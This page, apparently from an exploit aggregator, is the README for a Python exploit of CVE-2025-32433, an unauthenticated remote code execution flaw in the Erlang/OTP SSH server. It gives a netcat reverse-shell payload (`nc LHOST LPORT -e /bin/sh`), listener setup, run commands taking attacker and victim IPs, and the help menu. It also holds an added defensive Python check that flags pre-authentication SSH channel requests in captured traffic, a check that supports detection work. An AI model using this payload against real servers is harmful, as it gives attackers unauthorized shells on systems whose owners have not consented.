## https://sploitus.com/exploit?id=EB1C8ABF-8BCF-5271-8CEE-8FC722F01045
# CVE-2025-32433 Erlang SSH Library Exploit 🛑
# Description:
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions `OTP-27.3.3`, `OTP-26.2.5.11`, and `OTP-25.3.2.20`, an SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions `OTP-27.3.3`, `OTP-26.2.5.11`, and `OTP-25.3.2.20`. A temporary workaround is to disable the SSH server or to block access to it with firewall rules.
# Metrics:
+ CNA: GitHub, Inc.
+ Base Score: 10.0 CRITICAL ⚫
+ Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
# Features:
+ Original exploit by Matthew Keeley
+ Updated version by Tyler Ramsbey:
  1. Command-line arguments for LHOST, LPORT, RHOST, and RPORT
  2. Built-in help and usage via `argparse`
  3. Erlang-style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
  4. Clean function decomposition and status logging for each stage
# Prerequisites:
+ Python3
+ A working `nc` (Netcat) listener on your attack machine
+ Network access to the target SSH service (default port `22`)
# Usage:
1. Start your listener on the attack box:
```
nc -lvnp 4444
```
2. Run the exploit:
```
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
```
3. Wait for the shell to connect back to your listener.
# Help Menu:
```
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.10.10)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)
```
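
A defender-side check for the "pre-auth SSH channel request" named in the help text, as an added example that is not part of the original repository: it parses the cleartext part of a client-to-server SSH stream (for example, one reassembled from a packet capture) and reports connection-protocol messages (numbers 80 to 127 per RFC 4250, which include channel open 90 and channel request 98) that arrive before `SSH_MSG_NEWKEYS`. The function names and sample streams are constructed for illustration, and the check assumes the request is sent unencrypted, before key exchange completes.

```python
import struct

# SSH message numbers (RFC 4250 / RFC 4253).
SSH_MSG_NEWKEYS = 21
CONNECTION_MSGS = range(80, 128)  # connection protocol, e.g. 90 channel open, 98 channel request

def split_packets(stream):
    """Yield the payload of each cleartext SSH packet after the identification line."""
    nl = stream.find(b"\n")
    if not stream.startswith(b"SSH-") or nl < 0:
        raise ValueError("no SSH identification string")
    pos = nl + 1
    while pos + 5 <= len(stream):
        pkt_len, pad_len = struct.unpack_from(">IB", stream, pos)
        end = pos + 4 + pkt_len
        if pkt_len < pad_len + 2 or pkt_len > 35000 or end > len(stream):
            break  # malformed or truncated capture: stop parsing
        yield stream[pos + 5:end - pad_len]
        pos = end

def preauth_connection_messages(client_stream):
    """Return message numbers 80..127 seen before the client's SSH_MSG_NEWKEYS."""
    hits = []
    for payload in split_packets(client_stream):
        if payload[0] == SSH_MSG_NEWKEYS:
            break  # later packets are encrypted and not inspectable here
        if payload[0] in CONNECTION_MSGS:
            hits.append(payload[0])
    return hits

def make_packet(msg_type, body=b""):
    """Frame a constructed sample packet: length, padding length, payload, zero padding."""
    payload = bytes([msg_type]) + body
    pad = 8 - (len(payload) + 5) % 8
    if pad < 4:
        pad += 8
    return struct.pack(">IB", len(payload) + pad + 1, pad) + payload + bytes(pad)

# Constructed sample streams with zero-filled bodies (not captured traffic).
BANNER = b"SSH-2.0-constructed_client\r\n"
NORMAL = BANNER + make_packet(20, bytes(16)) + make_packet(30, bytes(32)) + make_packet(21)
SUSPECT = BANNER + make_packet(20, bytes(16)) + make_packet(90, bytes(12)) + make_packet(98, bytes(12))

if __name__ == "__main__":
    for name, stream in (("normal", NORMAL), ("suspect", SUSPECT)):
        print(name, preauth_connection_messages(stream))
```

A compliant client sends no connection-protocol message before authentication, so any hit is worth alerting on; the check cannot see requests sent after `SSH_MSG_NEWKEYS`, because that traffic is encrypted.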
# Disclaimer ⚠️
For educational and research purposes only. Use only against systems you own or have permission to test.